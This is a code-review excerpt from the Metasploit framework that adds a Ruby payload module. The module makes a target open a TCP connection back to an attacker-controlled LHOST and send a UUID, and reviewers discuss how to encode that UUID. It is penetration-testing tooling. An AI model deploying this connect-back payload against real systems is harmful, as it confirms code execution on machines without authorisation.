modules/payloads/singles/ruby/pingback_reverse_tcp.rb

```diff
@@ -0,0 +1,46 @@
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/ruby'
+
+require 'msf/base/sessions/pingback'
+require 'msf/core/payload/pingback'
+
+module MetasploitModule
+
+  CachedSize = 146
+
+  include Msf::Payload::Single
+  include Msf::Payload::Ruby
+  include Msf::Payload::Pingback
+  include Msf::Payload::Pingback::Options
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name' => 'Ruby Pingback, Reverse TCP',
+      'Description' => 'Connect back to the attacker, sends a UUID, then terminates',
+      'Author' => 'asoto-r7',
+      'License' => MSF_LICENSE,
+      'Platform' => 'ruby',
+      'Arch' => ARCH_RUBY,
+      'Handler' => Msf::Handler::ReverseTcp,
+      'Session' => Msf::Sessions::Pingback,
+      'PayloadType' => 'ruby'
+    ))
+  end
+
+  def generate
+    # return prepends(ruby_string)
+    return ruby_string
+  end
+
+  def ruby_string
+    self.pingback_uuid ||= generate_pingback_uuid
+
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+
+    return "require 'socket';" \
+      "c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" \
+      "c.puts(\'#{self.pingback_uuid.gsub('-', '')}\'.scan(/../).map { |x| x.hex.chr }.join);" \
```

Comment:
Is there a reason for performing the uuid-to-hex conversion on the client side? All other pingback payloads perform processing locally.

Reply:
I may be misunderstanding, but the binary payloads do the local conversion of UUID to hex, and the scripting/command payloads use string-based uuids until transmission.  That makes the most sense to me, since we package the binary payloads as binary files for transmission and the command/scripting payloads as strings for transmission.  What would we get by putting a binary blob in the middle of a payload string?  That seems like a bad idea, so I feel like I'm missing something?

Reply:
We definitely don't want non-ASCII strings in the script payloads, though this could be more efficiently encoded. Consider:
```ruby
"c.puts(\'#{[[self.pingback_uuid.gsub('-', '')].pack('H*')].pack('m0')}\'.unpack('m0'));"
```